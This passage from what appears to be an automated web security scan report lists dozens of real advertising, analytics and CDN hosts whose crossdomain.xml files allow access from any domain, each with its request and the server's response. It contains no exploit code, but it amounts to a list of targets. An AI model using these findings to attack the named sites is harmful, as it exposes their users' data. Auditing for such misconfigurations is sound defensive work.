Last-Modified: Tue, 12 Apr 2011 10:51:02 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 118
Date: Tue, 19 Jul 2011 20:43:17 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.13. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Wed, 20 Jul 2011 14:26:45 GMT
Date: Tue, 19 Jul 2011 14:26:45 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.14. http://b3.mookie1.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.15. http://bh.contextweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205345000"
Last-Modified: Thu, 15 Jul 2010 14:49:05 GMT
Content-Type: application/xml
Content-Length: 384
Date: Tue, 19 Jul 2011 18:37:29 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.16. http://bs.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 19 Jul 2011 20:43:12 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.17. http://c.atdmt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.atdmt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 14:24:25 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.18. http://cache.specificmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:20 GMT
Server: PWS/1.7.2.3
X-Px: ms jfk-agg-n63 ( jfk-agg-n58), ht-d jfk-agg-n58.panthercdn.com
ETag: "e8a17-110-476483d0fa140"
Cache-Control: max-age=604800
Expires: Tue, 26 Jul 2011 01:38:10 GMT
Age: 68770
Content-Length: 272
Content-Type: application/xml
Last-Modified: Mon, 19 Oct 2009 11:42:21 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.19. http://cdn.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Tue, 19 Jul 2011 20:43:08 GMT
Date: Tue, 19 Jul 2011 20:43:08 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.20. http://creatives.as4x.tmcs.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://creatives.as4x.tmcs.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: creatives.as4x.tmcs.net

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Nov 2009 02:41:10 GMT
ETag: "23ca27-138-478880f095d80"
Accept-Ranges: bytes
Content-Length: 312
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

5.21. http://d.agkn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.agkn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1308732886000"
Last-Modified: Wed, 22 Jun 2011 08:54:46 GMT
Content-Type: application/xml
Content-Length: 219
Date: Tue, 19 Jul 2011 20:44:50 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...

5.22. http://dev.virtualearth.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dev.virtualearth.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:45 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.23. http://ecn.api.tiles.virtualearth.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.api.tiles.virtualearth.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.api.tiles.virtualearth.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 13 Jul 2011 18:25:34 GMT
Accept-Ranges: bytes
ETag: "89839418a41cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:42 GMT
Connection: close
Content-Length: 207

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.24. http://ecn.dev.virtualearth.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.dev.virtualearth.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:43 GMT
Content-Length: 277
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.25. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.t0.tiles.virtualearth.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 78401
Date: Tue, 19 Jul 2011 12:24:12 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.26. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.t1.tiles.virtualearth.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 78331
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.27. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.t2.tiles.virtualearth.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 118980
Date: Tue, 19 Jul 2011 12:24:13 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.28. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.t3.tiles.virtualearth.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 81536
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.29. http://external.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.30. http://farecastcom.122.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://farecastcom.122.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: farecastcom.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:00:29 GMT
Server: Omniture DC/2.0.0
xserver: www261
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.31. http://files.livedrive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://files.livedrive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: files.livedrive.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 11 Mar 2011 17:51:48 GMT
Accept-Ranges: bytes
ETag: "b0ee90fe14e0cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Served-By: 103
Date: Tue, 19 Jul 2011 12:24:11 GMT
Connection: close
Content-Length: 141

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

5.32. http://g-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:38 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.33. http://img1.catalog.video.msn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img1.catalog.video.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:55 GMT
Content-Length: 177
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.34. http://img2.catalog.video.msn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img2.catalog.video.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 153211
Date: Tue, 19 Jul 2011 12:24:00 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Sun, 31 Jul 2011 17:50:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.35. http://img3.catalog.video.msn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img3.catalog.video.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 375813
Date: Tue, 19 Jul 2011 12:23:56 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Fri, 29 Jul 2011 04:00:23 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.36. http://img4.catalog.video.msn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img4.catalog.video.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 74735
Date: Tue, 19 Jul 2011 12:23:58 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Mon, 01 Aug 2011 15:38:23 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.37. http://in.getclicky.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://in.getclicky.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:25:25 GMT
Server: Apache
Last-Modified: Wed, 13 Jul 2011 23:34:25 GMT
ETag: "5e4041-c9-4a7fbdb512240"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.38. http://log50.doubleverify.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://log50.doubleverify.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: log50.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 08:19:04 GMT
Accept-Ranges: bytes
ETag: "0ccdbb4d97ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:44:45 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.39. http://media.fastclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:24:04 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Content-Length: 202
Keep-Alive: timeout=5, max=19943
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.40. http://metrics.boston.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.boston.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:14 GMT
Server: Omniture DC/2.0.0
xserver: www54
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.41. http://metrics.ticketmaster.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.ticketmaster.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:41 GMT
Server: Omniture DC/2.0.0
xserver: www388
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.42. http://metrics.versionone.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.versionone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.versionone.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:36 GMT
Server: Omniture DC/2.0.0
xserver: www316
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.43. http://now.eloqua.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 19 Jul 2011 14:20:43 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.44. http://pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.45. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 20 Jul 2011 20:43:03 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.46. http://puma.vizu.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:21 GMT
Server: PWS/1.7.2.3
X-Px: ht iad-agg-n5.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 23:38:44 GMT
Age: 162337
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

5.47. http://r.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 19 Jul 2011 20:43:05 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:04 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.48. http://s3.amazonaws.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s3.amazonaws.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.amazonaws.com

Response

HTTP/1.1 200 OK
x-amz-id-2: 8xNjpRAu7Xx/lc8DphWv07o3cZv3vHeaXvqTPrAsacX72TjBxMXQD9zfgIcW9o8Q
x-amz-request-id: 5E5F0DAE9BC0C977
Date: Tue, 19 Jul 2011 18:37:18 GMT
Content-Type: text/xml
Connection: close
Server: AmazonS3

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-domain-pol
...[SNIP]...

5.49. http://secure.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 18:37:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 18:37:05 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml
Connection: close
Content-Length: 255

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.50. http://segment-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:35 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
